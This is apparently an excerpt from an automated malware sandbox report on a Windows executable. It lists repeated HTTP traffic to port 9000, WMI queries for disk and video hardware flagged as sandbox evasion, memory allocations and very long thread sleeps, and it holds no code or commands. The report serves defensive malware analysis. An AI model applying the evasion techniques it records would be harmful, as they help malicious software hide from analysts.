                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49900
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49904
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49919
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49921
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49934
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49937
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49945
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49946
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49947
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49948
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49950
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49952
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49954
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49956
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49957
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49958
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49959
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49963
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49965
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49966
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49967
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49968
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49969
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49970
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49971
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49977
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49978
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49982
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49984
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49986
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49987
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49988
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49991
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49992
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49993
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49996
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49997
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49998
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50002
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeMemory allocated: 47F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWindow / User API: threadDelayed 2695Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWindow / User API: threadDelayed 6981Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -28592453314249787s >= -30000sJump to behavior
